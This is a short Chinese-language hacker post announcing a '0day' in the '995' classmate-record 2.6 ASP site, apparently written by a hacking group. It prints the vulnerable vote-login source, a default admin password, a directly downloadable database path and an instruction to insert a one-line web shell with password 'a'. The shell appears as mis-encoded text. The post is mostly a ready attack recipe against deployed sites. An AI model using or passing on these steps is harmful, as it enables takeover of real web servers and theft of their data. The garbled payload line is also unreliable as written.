995在线美化修改版同学录2.6精华版 0day

同学录2.6功能：点歌，留言，论坛以及照片分享等功能

漏洞文件 /vote/login1.asp
--------------------------------------------------------------------------------
<%

IF Request.Form("IsSub")="YES" THEN

Set conn=Server.CreateObject("ADODB.Connection")

conn.open ConnStr

Set rs=conn.execute("Select 值 From 系统 Where ID=1")

IF rs(0)=Request.Form("password") THEN

rs.close

conn.close

Set conn=nothing

Set rs=nothing

Session("fjvote_IsManager")=True

Response.redirect "list.asp"

ELSE

rs.close

conn.close

Set conn=nothing

Set rs=nothing

Response.write "<Script Language=JavaScript>alert('密码错误，请重新输入')</Script>"

END IF

END IF

str="你尚未登录，或者超时断开连接"

IF Request.QueryString("cmd")="out" THEN

str="你已经成功退出管理系统"

Session("fjvote_IsManager")=""

END IF

%>
-------------------------------------------------------------

未验证前台登录
前台有个上传漏洞 意义不大 就不发了
一般管理员只修改了主目录的数据库地址 忽略了这个投票系统
后台管理的投票管理密码是：
123456
默认数据库地址 http://www.hackqing.com/vote/data.asa
可以直接插 ┼攠數畣整爠煥敵瑳∨≡┩愾    密码为：a


源码参考地址 http://www.cyxdy.cn/soft/softdown.asp?softid=26203
by r0eXpeR & 3EST ring3h &Qing edit